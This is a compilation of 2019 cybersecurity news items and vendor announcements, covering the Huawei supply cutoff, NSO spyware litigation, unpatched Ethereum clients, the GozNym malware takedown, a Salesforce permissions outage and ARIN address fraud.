Chipmakers Cut Huawei Shipments

Chipmakers Cut Huawei Shipments

European and US chipmakers have stopped supplying Huawei with products while Google will cease providing technical Android support from the next OS iteration, as Donald Trump’s executive order starts to bite.

Google said in a tweet yesterday: “while we are complying with all US gov't requirements, services like Google Play & security from Google Play Protect will keep functioning on your existing Huawei device.”

However, it’s believed the same will not be true of new Huawei handsets. Google is also set to cut key support for the operating system from its next version, which could leave users without apps like YouTube and Google Maps, according to reports.

Huawei could still use the open source version of Android, although it has been developing an in-house OS which it could also switch across to in the event that Trump’s executive order is not reversed.

The firm is also being hit as global chipmakers cut supplies in compliance with the order. Qualcomm (smartphones) Intel (servers and laptops), Xilinx and Broadcom (networking kit) and many other US producers, as well as German chipmaker Infineon, have reportedly taken immediate action.

Huawei produces some processors and modems for its smartphones in-house, so Qualcomm’s decision is perhaps the least likely to affect it. The firm is said to have stockpiled other types of chips for several months while it waits to see whether the US action is a bargaining play or is set for the long-term.

Trump signed an executive order last week banning “foreign adversaries” from providing telecoms equipment in the US. However, Huawei and 70 subsidiaries were also placed on an “Entity List” meaning US firms are not able to supply it with their products unless Huawei is granted a special license from the Commerce Department.

Although the tech firms have already taken action, the department is still drawing up the enforcement plan, and has 150 days to do so.

3 Ways to Improve Your Online Store’s Cyber Security

If you don’t do your utmost best to ensure that your online store is safe to use, you could end up putting your customers in real danger. From their finances being stolen to their personal data being hacked into, any kind of trouble could befall your site’s users if you do not take cyber security seriously. Make sure, then, that you take it seriously!

When it comes to improving your online store’s cybersecurity measures, the following advice makes for essential reading.

Make your mobile payments safer

One of the most burgeoning e-commerce trends is mobile payment. As stated on Oberlo’s mobile shopping trends article, this is because this kind of transaction process prioritizes comfort, and it makes the buying process a whole lot simpler. You would be foolish not to grant your customers the opportunity to pay for things on your store via their mobile devices.

Allowing this kind of payment to take place does come with its fair share of drawbacks; however, the biggest one being that it isn’t always the safest form of transaction. This doesn’t mean that you can’t strengthen your mobile payment process, though. Some of the measures that you can and should put into place in this instance include:

  • Only ever using a trusted payment platform
  • Ensuring that your payment terminals are NFC-enabled
  • Encrypting your network to ensure sensitive information cannot be sent through it

Switch to HTTPS

In this day and age, if you continue to stick with the HTTP protocol, your online store will be a sitting duck for cyber criminality. If you’re serious about safety, you must switch to HTTPS.

Created initially to safeguard the particularly sensitive elements of e-commerce sites, such as the payment process, HTTPS is now used to protect whole websites. By embracing this protocol, you will be able to be sure that your visitors’ data will remain safe at all conceivable points.

Protect your Admin Panel

Your Admin Panel is the aspect of your store that is least difficult for cybercriminals to crack. All it takes is for you to set a weak password, and hackers can have a field day when it comes to accessing all of the data you store in the backend of your site.

To protect your Admin Panel, you need to:

If they were to encounter trouble with a cybercriminal while using your online store, you can be sure that your customers will not give you a second chance. They will lose trust in you instantly, and more than likely never return to you again — and they’ll tell everybody that they know to avoid your website in the future, too, for good measure. If you don’t take cybersecurity seriously, you could also even find yourself in hot water with the authorities. The impact cyber criminality could have on your online store is something you should want to avoid at all costs, which is why you must put all of the above advice into practice as soon as possible.

The post 3 Ways to Improve Your Online Store’s Cyber Security appeared first on CyberDB.

Amnesty International filed a lawsuit against Israeli surveillance firm NSO

Amnesty International filed a lawsuit against Israeli surveillance firm NSO and fears its staff may be targeted by the company with its Pegasus spyware.

The name NSO Group made the headlines last week after the disclosure of the WhatsApp flaw exploited by the company to remotely install its surveillance software.

The Israeli firm is now facing a lawsuit backed by Amnesty International, but the non-governmental organization fears its staff may be under surveillance spyware delivered leveraging the WhatsApp issue.

The lawsuit was filed in Israel by about 50 members and supporters of the human rights group. The organization calls on the Israeli ministry of defence to ban the export of the Pegasus surveillance software developed by NSO Group.

“An affidavit from Amnesty is at the heart of the case, and concludes that “staff of Amnesty International have an ongoing and well-founded fear they may continue to be targeted and ultimately surveilled” after a hacking attempt last year.” reads the post published by The Guardian.

“The Israeli government’s Defence Export Controls Agency has failed to exercise proper oversight “despite serious allegations of abuse”, the affidavit claimed, adding: “Because of DECA’s inaction, NSO Group can continue to sell its software to governments known to target human rights defenders.””

Officially the sale of surveillance software is limited to authorized governments to support investigation of agencies on criminal organizations and terrorist groups.

Unfortunately, its software is known to have been abused to spy on journalists and human rights activists.

In July, Citizen Lab collected evidence of attacks against 175 targets worldwide carried on with the NSO spyware. Citizen Lab uncovered other attacks against individuals in Qatar or Saudi, where the Israeli surveillance software is becoming very popular.

In August, an Amnesty International report confirmed that its experts identified a second human rights activist, in Saudi Arabia, who was targeted with the powerful spyware.

According to Joshua Franco, Amnesty’s head of technology and human rights, the trading of surveillance software is going out-of-control.

On August, the human rights group published a report that provides details on the attack against an employee at Amnesty International. The hackers attempted to compromise the mobile device of a staff member in early June by sending him a WhatsApp message about a protest in front of the Saudi Embassy in Washington.

surveillance Amnesty International NGO spyware

The organization added that such kind of attacks is becoming even more frequent, a growing number of Israeli surveillance software being used to spy on human rights operators and opposition figures in the Middle East and beyond.

Amnesty International traced the malicious link in the message to the surveillance network of the Israeli firm NSO Group.

The Guardian reported that NSO Group already faced many other lawsuits, such as the one backed by Omar Abdulaziz, a Saudi dissident based in Montreal. In December Abdulaziz filed a lawsuit in Israel in which he claimed that his phone was infected with the NSO spyware when he was in regular contact with the journalist Jamal Khashoggi.

In November, Snowden warned of abuse of surveillance software that also had a role in the murder of the Saudi Arabian journalist Jamal Khashoggi.

Khashoggi is believed to have been killed by Saudi Arabi’s agents, and the country has licensed NSO software in 2017, paying $55m for the technology.

NSO said it wants to demonstrate that it is not involved in any abuse of its technology, it prepared a report composed of 26 pages to reply to the accusations made by Amnesty and Citizen Lab.

It is curious that early 2019, a majority stake in NSO was acquired by the London based firm Novalpina Capital, founded by the banker and philanthropist Stephen Peel.

The Guardian reported an excerpt of the reply to Amnesty, signed by Peel, that states that in “almost all” the cases of complaints of human rights abuse raised, the alleged victim of hacking had not been a target or the government in question had acted with “due lawful authority”.

“We believe that the reality is different. We’ve seen them target human rights organisations and no evidence they’ve been able to effectively control governments when complaints have been raised.” replied Danna Ingleton, the deputy director of Amnesty’s technology division.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – NSO Group, Amnesty International)

The post Amnesty International filed a lawsuit against Israeli surveillance firm NSO appeared first on Security Affairs.

On the path to Zero Trust security: Time to get started

No need to belabour the point. We all know that trying to defend the network perimeter is a bit futile in today’s mobile and cloud first world. So, the obvious question – what’s next? Vendors are quick to come to your aid with their latest, next generation, virtualized, machine learning and AI based security platform. Industry analysts on the other hand are proposing various security frameworks and approaches for reducing risk. Whether it’s Gartner with … More

The post On the path to Zero Trust security: Time to get started appeared first on Help Net Security.

Microsoft’s Attack Surface Analyzer now works on Macs and Linux, too

Microsoft has rewritten and open-sourced Attack Surface Analyzer (ASA), a security tool that points out potentially risky system changes introduced by the installation of new software or configuration changes. About Attack Surface Analyzer The initial version of the tool (v1.0, aka “classic”) was released in 2012 and worked only on Windows. It can be still downloaded, but is not supported any longer. This newest version (v.2.0) is built using .NET Core 2.1 and Electron, and … More

The post Microsoft’s Attack Surface Analyzer now works on Macs and Linux, too appeared first on Help Net Security.

Ransomware and malware attacks decline, attackers adopting covert tactics

There has been a major decline in ransomware and malware attacks, with Ireland having some of the lowest rates globally, according to the latest report released by Microsoft. This is a significant change from 2017, following a prolific series of attacks that targeted supply chains globally. Initial predictions were that these would increase, however, improvements in cybersecurity measures and detection have impacted on the success rates of these attacks. In fact, there has been a … More

The post Ransomware and malware attacks decline, attackers adopting covert tactics appeared first on Help Net Security.

Over half of all reported vulnerabilities in Q1 2019 have a remote attack vector

There were 5,501 vulnerabilities aggregated by Risk Based Security’s VulnDB that were disclosed during the first three months of 2019. This represents a 1% increase over the same period in 2018, making this Q1 an all-time high. The results were released in the Q1 2019 Vulnerability QuickView Report. CVSSv2 scores of 9.0+, deemed critical issues, accounted for 14.0% of all published Q1 2019 vulnerabilities. Risk Based Security’s VulnDB published 2,539 (85%) more vulnerabilities than CVE/NVD … More

The post Over half of all reported vulnerabilities in Q1 2019 have a remote attack vector appeared first on Help Net Security.

Keeping Passwords Simple

We know at times this whole password thing sounds really complicated. Wouldn't be great if there was a brain dead way you could keep passwords simple and secure at the same time? Well, it's not nearly as hard as you think. Here are three tips to keeping passwords super simple while keeping your accounts super secure.

Phishing targeting SaaS and webmail services increased to 36% of all phishing attacks

Users of Software-as-a-Service (SaaS) and webmail services are being targeted with increasing frequency, according to the APWG Q1 2019 Phishing Activity Trends Report. The category became the biggest target in Q1, accounting for 36 percent of all phishing attacks, for the first time eclipsing the payment-services category which suffered 27 percent of attacks recorded in the quarter. Online SaaS applications have become fundamental business tools, since they are convenient to use and cost-effective. SaaS services … More

The post Phishing targeting SaaS and webmail services increased to 36% of all phishing attacks appeared first on Help Net Security.

Do You Know When The First Cyber Attack Took Place? Read On

WannaCry, a malicious computer virus that encrypts data and demands ransom, hit thousands of computers across the world, causing several organization to close down. Not a day goes by without a large company admits that its data has been breached. Cyber attacks are more known to be a thing of modern life, but their story goes farther than expected.

Do you know when the first cyber attack occurred? Many attribute this to Robert Morris, a 20-year-old Cornell undergraduate student, in 1988. He was also the first person to be charged under the Fraud and Cyber Abuse Act. Nevertheless, this was not the first cyber attack. The first cyber attack happened when optical telegraphy known as semaphore was used, long before our Internet and computers came into existence. This happened in the year 1834.

The semaphore system included a chain of towers with each tower having a mobile wooden arm in its upper part. Different configurations of these arms have been used to denote different symbols, letters, and numbers. The operators of each tower would use a telescope to verify the configuration of the adjacent tower and then reproduce them in their own tower. This made it possible to deliver messages much faster. The semaphore network was reserved exclusively for government use; however, in 1834, two brothers, François and Joseph Blanc came up with means of hacking into the system for their personal benefit.

François and Joseph Blanc were dealing with government bonds on the Bordeaux stock exchange that kept a close watch on the Paris stock exchange. The Paris stock exchange was the primary market, and the secondary markets always lagged due to the time it took for the information to travel through the post. So if traders could get to know the information in advance, they could make a lot of money by anticipating the market move.

The Blanc brothers’ bribed a telegraph operator who provided information on the stock market, and he had an accomplice in Paris who will help him get the details. The operator would then send the news of Tours to Bordeaux using the semaphore system. However, he breached the message by adding errors such as; codes to government messages that were later deciphered by another operator who was Blanc’s person stationed close to the Bordeaux line.

This lasted for approximately two years until one day the Tours operator became ill. So he shared this misdoing with one of his friends with a hope that he will continue the practice. The friend took a back seat and reported the operator to the authorities. The Blanc brothers were arrested for their cyber attack but were released due to the lack of an adequate law.

“The Blanc brothers’ story is also a reminder that with any new invention, people will always find a way to use it maliciously.” This is a timeless aspect of human nature, and it’s not something technology can or should be designed to solve, “said Tom Standage of The Economist writes. This is still so relevant.

Related Resources:

How to Protect Yourself from Online Cyber Attacks at Work

How A Website Security Scanner Helps Lessen Future Cyber Attacks

The 3 Sectors Most Prone to Cyber Attacks

Businesses Should Be Aware of Growing Cyber Attacks

Artificial Intelligence as the Next Host of Cyber Attacks

The post Do You Know When The First Cyber Attack Took Place? Read On appeared first on .

Companies investing in advanced forensic capabilities to identify attackers in greater detail

One in five companies are already using forensic investigations and other sophisticated methods to identify their attackers, like setting up honey pots and repositories of fake data to give attackers the idea they’ve hit real data while acting as a diversion tactic, according to Neustar. Companies’ growing investment in advanced forensic capabilities that can help identify attackers in greater detail is increasingly eclipsing what most law-enforcement agencies are willing to devote. 72 percent of respondents … More

The post Companies investing in advanced forensic capabilities to identify attackers in greater detail appeared first on Help Net Security.

Things You Need to Know About Open Source – The FAQ Edition

Open Source projects can be a great asset, or they can be a curse. It is all in how you manage it. To be successful in using open source, there are several things to keep in mind, from licensing to updates. And if you ignore any of them, it can cause problems. Here are some […]… Read More

The post Things You Need to Know About Open Source – The FAQ Edition appeared first on The State of Security.

JASK launches a new Heads Up Display for security operations centers

JASK, the provider of the industry’s first cloud-native SIEM platform, unveiled a first-of-its-kind Heads Up Display (HUD) for security operations centers (SOCs) based on cutting-edge scientific design principles and visualization concepts never before used in the cybersecurity industry. Drawing inspiration from leading designers in science fiction and gaming as well as the latest user interface design concepts, the enhanced JASK ASOC platform offers maximal functionality on a single screen. This update enables security teams to … More

The post JASK launches a new Heads Up Display for security operations centers appeared first on Help Net Security.

QuintessenceLabs to extend support for RSA Data Protection Manager software customers

QuintessenceLabs has announced a partnership to allow customers of RSA Data Protection Manager software (DPM) to receive extended support beyond the RSA DPM End-Of-Life date of September 30, 2019. As part of this agreement, QuintessenceLabs will provide the same level of enterprise-class support, Service Level Objectives and product quality as RSA provided. RSA DPM customers can renew their DPM maintenance contract directly with QuintessenceLabs to benefit from long-term DPM support. QuintessenceLabs is also providing a … More

The post QuintessenceLabs to extend support for RSA Data Protection Manager software customers appeared first on Help Net Security.

Checkmarx deploys CxSAST on Project Hosts’ FPC FedRAMP-authorized PaaS

Checkmarx, the Software Exposure Platform for the enterprise, has deployed CxSAST on Project Hosts’ Federal Private Cloud (FPC) FedRAMP-authorized Platform-as-a-Service (PaaS). This deployment facilitates Federal agencies to grant a FedRAMP Moderate or DOD Impact Level 5 (IL5) Authority to Operate (ATO) for a cloud deployment of the Checkmarx CxSAST solution. By being deployed on Project Hosts’ Federal Private Cloud (FPC) FedRAMP-authorized Platform-as-a-Service (PaaS), Checkmarx inherits a vast majority of the controls required for FedRAMP and … More

The post Checkmarx deploys CxSAST on Project Hosts’ FPC FedRAMP-authorized PaaS appeared first on Help Net Security.

ExtraHop for IBM QRadar part of collaborative development to stay ahead of evolving threats

ExtraHop, provider of enterprise cyber analytics from the inside out, launched the ExtraHop for IBM QRadar app, which integrates with IBM Security Intelligence technology to stream accurate, contextual network behavioral detections into the QRadar SIEM. With Reveal(x) detections in QRadar, organizations have a complete picture of suspicious or anomalous behavior on their network, as well as the ability to perform rapid, guided investigations. This bi-directional integration lets analysts move back to ExtraHop to explore forensic … More

The post ExtraHop for IBM QRadar part of collaborative development to stay ahead of evolving threats appeared first on Help Net Security.

HSB Farm Cyber Insurance solution to protect farmers from hackers and malware

Hartford Steam Boiler (HSB), part of Munich Re, announced a new HSB Farm Cyber Insurance solution that helps protect farmers and farm technology from hackers, malware and other cyber attacks. “Innovative technologies are being deployed across the farming industry and data and information systems are helping farmers better understand how to maximize efficiency and production,” said James Hajjar, who leads the cyber practice for HSB’s reinsurance clients. “With this new reliance on digital information and … More

The post HSB Farm Cyber Insurance solution to protect farmers from hackers and malware appeared first on Help Net Security.

Venafi and GlobalSign partnership and integration to address DevOps certificate challenges

Venafi, the leading provider of machine identity protection, and GMO GlobalSign, a global Certificate Authority and leading provider of identity and security solutions for the Internet of Things (IoT), announced an expanded technology partnership and integration that seamlessly addresses DevOps certificate challenges. Additionally, Venafi Cloud is now fully integrated with GlobalSign’s high-performance PKI solutions for enterprises. The integration of Venafi Cloud and GlobalSign PKI for DevOps provides DevOps teams with quick, high-speed access to trusted … More

The post Venafi and GlobalSign partnership and integration to address DevOps certificate challenges appeared first on Help Net Security.

FlexiCapture Cloud now enhanced with REST API and Real-Time Capture

ABBYY, a global leader in Content IQ technologies and solutions, announced a series of innovations to ABBYY FlexiCapture, an AI-enabled enterprise platform to automate document processing workflows and convert unstructured content into structured data for better business outcomes. The updates include the launch of the ABBYY FlexiCapture Cloud REST API (Representational State Transfer Application Programming Interface) and the introduction of the new Real-Time Capture technology for real-time document processing in the cloud. As companies strive … More

The post FlexiCapture Cloud now enhanced with REST API and Real-Time Capture appeared first on Help Net Security.

At-Bay launches excess cyber insurance policy for clients up to $5Bn revenue

At-Bay launched an excess cyber insurance policy for clients across all industry classes. At-Bay developed this product to fulfill broker demand for access to the At-Bay Security Team for organizations with insurance towers. The At-Bay Security Team provides insureds with ongoing vulnerability scanning, threat monitoring, and 24/7 support to help prevent loss. With the new product launch, At-Bay has made these security services available to Excess clients. “We wanted to create an excess program for … More

The post At-Bay launches excess cyber insurance policy for clients up to $5Bn revenue appeared first on Help Net Security.

HITRUST supports Texas legislation to create a Privacy Protection Advisory Council

HITRUST, a leading data protection standards development and certification organization, supports legislation that would create a council to study privacy laws and how privacy practices for Texas businesses could be strengthened through potential legislation. Representative Giovanni Capriglione’s (Southlake) House Bill 4390, passed by the Texas House unanimously on May 7, 2019 and would create the Texas Privacy Protection Advisory Council. The Council would study and evaluate Texas laws and other privacy laws in order to … More

The post HITRUST supports Texas legislation to create a Privacy Protection Advisory Council appeared first on Help Net Security.

Weekly Update 139

Weekly Update 139

Per the beginning of the video, it's out late, I'm jet lagged, all my clothes are dirty and I've had to raid the conference swag cupboard to even find a clean t-shirt. But be that as it may, I'm yet to miss one of these weekly vids in the 2 and a half years I've been doing them and I'm not going to start now! So with that very short intro done, here's this week's and I'll try and be a little more on the ball for the next one.

Weekly Update 139
Weekly Update 139
Weekly Update 139


  1. Google is having some issues with the U2F keys the recommend for their Advanced Protection Program (but seriously, this is a pretty minor issue)
  2. I'm definitely still recommending this approach for locking down Google accounts (that's my piece from November on how to get it all set up)
  3. Forbes had some Magecart script running on their site (interesting breakdown by @bad_packets)
  4. Let's Encrypt's CT log is now up and running (with support from Sectigo too so kudos to them for that, it's a very different approach to the old Comodo)
  5. I'm up for some European Blogger Awards again! (I'd love your votes folks 😎)
  6. Twilio is sponsoring my blog again this week (check how to implement 2FA in your app with Authy)

Ireland And Its Evolving Cybersecurity Issues

Ireland in 2018 experienced a huge decline of malware infection, most especially the lesser cases of ransomware compared to 2017. The European country of almost 5 million people is mirroring the global trend of cybersecurity issues, as cybercriminals are heavily transitioning from the disruptive and destructive ransomware to a silent yet very profitable phishing and cryptojacking. Ireland recorded in 2018 just 1.26% of monthly infection rate, which is one of the lowest in the European region and one of the lowest globally.

This is a sharp contrast to 2017 when millions of computers worldwide were heavily infected by ransomware, more particularly the likes of WannaCry and NoPetya. Cryptojacking is easy to deploy and very difficult to detect, as it is basically a program that consumes CPU/GPU resources like the rest of the programs in a computing device. But the consumed CPU/GPU resources does not produce a tangible output like a typical benign program but rather designed to compute for crypto-hashes in the attempt to mine cryptocurrency.

“While we have seen a welcome drop in ransomware and malware attacks, it would be a mistake to assume the level of the cyber threat to Irish organizations has also decreased. We are seeing major behavioral change amongst criminal hackers, who want access to a victim’s computer and an organization’s network to access data, but also use their computing power to mine for cryptocurrency. This is about playing the long game and exploiting people’s lack of training and understanding when it comes to cybercrime. Microsoft’s analysts predict phishing will continue to be an issue for the foreseeable future for that reason,” explained Des Ryan, Microsoft Ireland’s Solutions Director.

To add insult to injury, Microsoft underscored that many private and public entities in the country lack adequate staff training when it comes to cybersecurity. The vulnerable companies also practice lax IT security protocols, a trait that opens an opportunity for something that goes wrong to grow exponentially.

Also, Read:

5 Fundamental Cybersecurity Issues With Email

Will AI Solve the Gaming Industry’s Cybersecurity Issues?

How Healthcare Organizations Can Solve Cybersecurity Issues

Importance of Changes in Corporate Mindset in Preventing CyberSecurity Issues

Orange’s Acquisition of SecureLink, Set To Expand Cybersecurity Market

The post Ireland And Its Evolving Cybersecurity Issues appeared first on .

Unpatched Ethereum Clients expose the ecosystem to 51% Attack risk

Security researchers from SRLabs have published a report that analyzed the risks for Ethereum network caused by unpatched Ethereum clients.

Researchers at SRLabs published a report based on data, that revealed that a large number of nodes using the popular clients Parity and Geth is still unpatched. The expert discovered that the Ethereum clients and its users remained exposed for “extended periods of time” after security patches have been released.

“SRLabs research suggests that security vulnerabilities remain unpatched for many Ethereum blockchain participants for extended periods of time, putting the blockchain ecosystem at risk.” reads the report.

Experts pointed out that a hacker who controls more than 51% of the computational power in the Ethereum network can double spend coin and undermining the trust in the ecosystem. An attacker that can crash a large number of nodes, could be able to control 51% of the network in an easier way.

For that reason, denial of service issue are classified as high severity in cryptocurrency networks, the attackers can leverage these issue to reduce the amount of computational power needed to perform a 51% attack.

In February, SRLabs reported a vulnerability in the Parity client that could be exploited to remotely crash Parity Ethereum node running versions prior 2.2.10.

“According to our collected data, only two thirds of nodes have been patched so far. Shortly after we reported this vulnerability, Parity released a security alert, urging participants to update their nodes.” continues the report.

A month after the flaw was patched, experts have found that around 40% of all scanned Parity Ethereum nodes remained unpatched. Another patch released on Mar 2, 2019 was installed by around 70% of Parity Ethereum nodes, leaving the remaining 30% exposed.

The situation is worse is we consider that 7 percent of Parity nodes still run a version vulnerable to a critical consensus vulnerability patched in July 2018.

The following graph shows the percentage of unpatched Ethereum nodes in 2019 that decreases slowly over time.

Ethereum nodes.PNG

Researchers explained that the Parity Ethereum has an automated update process, but it suffers from high complexity and some updates are left out. 

The report confirms that the patch management for Geth client is even worse that does not include an auto-update feature. Geth clients remained unpatched for longer periods of time.

“According to their announced headers, around 44% of the Geth nodes visible at were below version v.1.8.20, a security-critical update, released two-month before our measurement.,” continues the SRLabs team.

Experts conclude that the lack of basic patch hygiene undermines the security of the entire Ethereum ecosystem.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – patch management, hacking)

The post Unpatched Ethereum Clients expose the ecosystem to 51% Attack risk appeared first on Security Affairs.

Week in review: New Intel CPU vulnerabilities, SharePoint servers under attack

Here’s an overview of some of last week’s most interesting news and articles: High-risk vulnerability in Cisco’s secure boot process impacts millions of devices Red Balloon Security has discovered a high-risk vulnerability in Cisco’s secure boot process which impacts a wide range of Cisco products in use among enterprise and government networks, including routers, switches and firewalls. Tips to spring clean your company’s social media and stay protected Spring is a great time for organizations … More

The post Week in review: New Intel CPU vulnerabilities, SharePoint servers under attack appeared first on Help Net Security.

Law Enforcement Operation Dismantles GozNym Banking Malware

An international law enforcement operation has led to the dismantling of the global cybercrime networkcybercrime network that used the GozNym banking malware to steal money from bank accounts across the world.

TechCrunch reports, “Europol and the U.S. Justice Department, with help from six other countries, have disrupted and dismantled the GozNym malware, which they say stole more than $100 million from bank accounts since it first emerged.”

Prosecutors have stated, in a press conference held in The Hague, that ten defendants in five countries have been charged with using the GozNym malware to steal money from over 41,000 victims, including business and financial institutions. Of these ten people, five have been arrested in Moldova, Ukraine, Bulgaria, and Russia while the remaining five, all Russians, are on the run. The leader of the cybercrime network and his technical assistant are being prosecuted in Georgia.

TechCrunch security editor Zack Whittaker writes, “All were charged with conspiracy to commit computer fraud, conspiracy to commit wire and bank fraud and conspiracy to commit money laundering. An eleventh member of the conspiracy, Krasimir Nikolov, was previously charged and extradited to the U.S. in 2016 and pleaded guilty in April in his role in the GozNym malware network.”

He adds, “The takedown was described as an “unprecedented international effort” by Scott Brady, U.S. attorney for Western Philadelphia — where a grand jury indicted the defendants — at the press conference announcing the charges.”

The victims of the GozNym attacks have not been named, but it’s reported that in the U.S at least 11 businesses, including two law firms and a casino, plus a church, have been impacted.

The banking malware GozNym was developed from two existing malware families- Gozi and Nymaim- and spread across the U.S, Germany, Poland and Canada. It first emerged in 2016 and has hit dozens of banks and credit unions since then. The leader of the cybercrime network working behind GozNym had built it from the code of the two malware families, both of which had their source code leaked years earlier. He then recruited accomplices and advertised GozNym on Russian speaking forums.

The TechCrunch report explains how GozNym, which is described as malware “as a service”, works- “The malware used encryption and other obfuscation techniques to avoid detection by antivirus tools. Then, spammers are said to have sent hundreds of thousands of phishing emails to infect staff at businesses and banks. After the malware infected its victim computers, the malware would steal the passwords control of bank accounts, which the criminals would later log in and cash out.”

The report further says that according to prosecutors, the GozNym network was “hosted and operated through a bulletproof service, a domain and web hosting known for lax attitudes toward cybercrime and favored by criminals.”

An administrator of the “Avalanche” network, an infrastructure platform which provided services to over 200 cybercriminals and which was dismantled in 2016 during a German-led operation, had also provided bulletproof hosting services to the GozNym network. This administrator would also face prosecution in Ukraine (where his apartment is located) for his role in providing bulletproof hosting services to the GozNym network.

Also, Read:

Security Researchers Uncover Dark Tequila Banking Malware

Ramnit Banking Trojan, August 2018’s Top Malware

Multimedia Editing Software Hacked to Spread Banking Trojan

Malware Attack Using Google Cloud Computing Platform

Redaman Banking Trojan of 2015 Resurrects, Targets Russian Email Users

The post Law Enforcement Operation Dismantles GozNym Banking Malware appeared first on .

Security Affairs newsletter Round 214 – News of the week

A new round of the weekly SecurityAffairs newsletter arrived!

The best news of the week with Security Affairs.

Kindle Edition

Paper Copy

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Hacking the ‘Unhackable eyeDisk USB stick
Security breach suffered by credit bureau Equifax has cost $1.4 Billion
Turkish Personal Data Protection Authority fined Facebook for Photo API bug
CVE-2019-11815 Remote Code Execution affects Linux Kernel prior to 5.0.8
Expert discovered how to brick all Samsung mobile phones
Facebook sues data analytics firm Rankwave over alleged data misuse
Over 10k+ GPS trackers could be abused to spy on individuals in the UK
Pacha Group declares war to rival crypto mining hacking groups
Reading the Yoroi Cyber Security Annual Report 2018
Malware Training Sets: FollowUP
Millions of computers powered by Intel chips are affected by MDS flaws
North Korea-linked ScarCruft APT adds Bluetooth Harvester to its arsenal
Thrangrycat flaw could allow compromising millions of Cisco devices
Unprotected DB exposed PII belonging to nearly 90% of Panama citizens
WhatsApp zero-day exploited in targeted attacks to deliver NSO spyware
Adobe patches over 80 flaws in Flash, Acrobat Reader, and Media Encoder
Microsoft Patch Tuesday addresses dangerous RDS flaw that opens to WannaCry-like attacks
SAP Security Patch Day for May 2019 fixes many missing authorization checks
Twitter inadvertently collected and shared iOS location data
A flaw in Google Titan Security Keys expose users to Bluetooth Attacks
A joint operation by international police dismantled GozNym gang
BlackTech espionage group exploited ASUS update process to deliver Plead Backdoor
Google ‘0Day In the Wild project tracks zero-days exploited in the Wild
Magecart hackers inject card Skimmer in Forbes Subscription Site
Microsoft renewed its Attack Surface Analyzer, version 2.0 is online
Past, present, and future of the Dark Web
The stealthy email stealer in the TA505 hacker groups arsenal
A flaw in Slack could allow hackers to steal, manipulate downloaded files
Chinese state-sponsored hackers breached TeamViewer in 2016
Cisco addressed a critical flaw in networks management tool Prime Infrastructure
Stack Overflow Q&A platform announced a data breach
XSS flaw in WordPress Live Chat Plugin lets attackers compromise WP sites
Dozens of Linksys router models leak data useful for hackers
Facebook banned Archimedes Group, misinformation made in Israel
Number of hacktivist attacks declined by 95 percent since 2015
Unistellar attackers already wiped over 12,000 MongoDB databases

Pierluigi Paganini

(SecurityAffairs – newsletter)

The post Security Affairs newsletter Round 214 – News of the week appeared first on Security Affairs.

Salesforce faced one of its biggest service disruption of ever

Salesforce is facing a huge outage, it shut down a good portion of its infrastructure due to change to the production environment.

A change in the production environment is the root cause of the broad outage suffered by Salesforce.

The service disruption affected its Pardot B2B marketing automation system, the cloud CRM company’s change broke access privileges settings across organizations and gave customers access to all of their respective company’s files.

“One of our projects had all its profiles modified to enable modify all, allowing all users access to all data.” reported a user on Reddit.

In response to the incident, Salesforce has denied all access to a hundred of cloud instances that host Pardot users, the blocked the access for any other user to the same systems, even if they were not using Pardot.

Salesforce customers have been unable to access the service since 09:56 PDT (16:56 UTC) on Friday.

“The deployment of a database script resulted in granting users broader data access than intended,” reads a note published by the company. “To protect our customers, we have blocked access to all instances that contain affected customers until we can complete the removal of the inadvertent permissions in the affected customer orgs.”

salesforce outage

Below the message published by Patrick Harris, Salesforce CTO and co-founder:

A few hours ago, Salesforce informed its users that it was able to restore access to most of its services, this means that the users experienced at least 15 hours of service disruption. Unfortunately, some organizations may still face problems, according to the latest notice issued by the CRM firm administrators will have to manually repair user account permissions.

“We have restored administrators’ access to all orgs affected by the recent permissions issue and have prepared a set of instructions for admins that may need guidance on how to manually restore user permissions. We have updated the instructions to include guidance for Field Service Lightning administrators.” states the company. “Those instructions can be found in this Known Issue article: In parallel, we are working on an automated provisioning fix to allow us to restore user permissions to where they were before the incident occurred.”

The company warns that a limited number of admins may still be experiencing issues such as logging in to their organizations or modifying permissions.

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – Salesforce, outage)

The post Salesforce faced one of its biggest service disruption of ever appeared first on Security Affairs.

Fraudulently Acquired IPv4 Addresses Revoked by ARIN

The US Registry for Internet Numbers, Ltd. (ARIN) won a legal case, against multi-year program designed to deceive the Internet community by approximately 735,000 IPv4 addresses. John Curran, President, and CEO of ARIN announced that the fraud had been discovered through an internal due diligence process.

ARIN is a non-profit organization responsible for distributing Internet numbers in the United States, Canada and parts of the Caribbean. The emerging market of IPv4 address transmission and growing demand has led to new attempts to fraudulently recover IPv4 addresses.

This is the first arbitration under the ARIN Registration Service Contract and the related process in the US District Court for the Eastern District of Virginia. ARIN has been able to prove the existence of a complicated scheme to fraudulently acquire resources, including many legalized official attestations sent to ARIN. “A company in South Carolina obtained and utilized 11 shelf companies across the United States, and intentionally created false aliases purporting to be officers of those companies, to induce ARIN into issuing the fraudulently sought IPv4 resources and approving related transfers and reassignments of these addresses. The defrauding party was monetizing the assets obtained in the transfer market, and obtained resources under ARIN’s waiting list process.” (ARIN Press Release).

The fraudulent entity adopts an aggressive position after ARIN requests to produce certain documents and explain its behavior. The suspects filed a motion for provisional detention orders and initial orders for ARIN in the US District Court and requested a hearing the following morning just before Christmas. “The aggressive posture was taken after ARIN indicated its intent to revoke addresses, while permitting defrauding entity to renumber to allow existing bona fide customers not to have service interrupted,” ARIN’s General Counsel told CircleID. “The litigation was filed against ARIN to seek an injunction to stop ARIN from revoking and enter arbitration. Some addresses were transferred for money prior to that demand, others were pending transfer and were never transferred due to ARIN investigation.”

Some fraudulently obtained addresses were transferred to third parties; however ARIN made no effort to pursue the parties that received the completed transfer, ARIN’s General Counsel told CircleID. The reason being: “(a) addressed were in another RIR service region (e.g. RIPE NCC and APNIC) and (b) ARIN did not see any evidence they knew of or participated in the fraud. In other words, they appeared to be bona fide 3rd parties.”

On May 1, 2019, ARIN obtained an arbitration award, which included revoking all fraudulent resources and $ 350,000 to ARIN for its legal fees.

